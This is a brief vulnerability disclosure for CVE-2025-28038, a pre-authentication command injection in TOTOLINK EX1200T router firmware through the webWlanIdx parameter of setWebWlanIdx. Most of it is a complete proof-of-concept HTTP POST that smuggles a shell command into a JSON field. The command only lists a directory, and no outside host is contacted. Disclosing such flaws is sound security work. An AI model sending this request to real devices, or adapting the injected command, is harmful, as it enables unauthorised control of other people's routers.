wireless.so-setWebWlanIdx-webWlanIdx

[CVE-ID]

CVE-2025-28038

[PRODUCT]

TOTOLINK

[Vendor of Product]

https://www.totolink.net/

[VERSION]

EX1200T V4.1.2cu.5232_B20210713

[Firmware]

https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/148/ids/36.html

[Vulnerability Type]

RCE

[Description]

The TOTOLINK EX1200T V4.1.2cu.5232_B20210713 was found to contain a pre-auth remote command execution vulnerability in the setWebWlanIdx function through the webWlanIdx parameter.

image.png

[POC]

POST /cgi-bin/cstecgi.cgi HTTP/1.1

Host: 192.168.0.1

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8

If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT

Connection: close

Content-Length: 67

{"topicurl":"setting/setWebWlanIdx",

"webWlanIdx":"\\nls>/test1\\n"}

image.png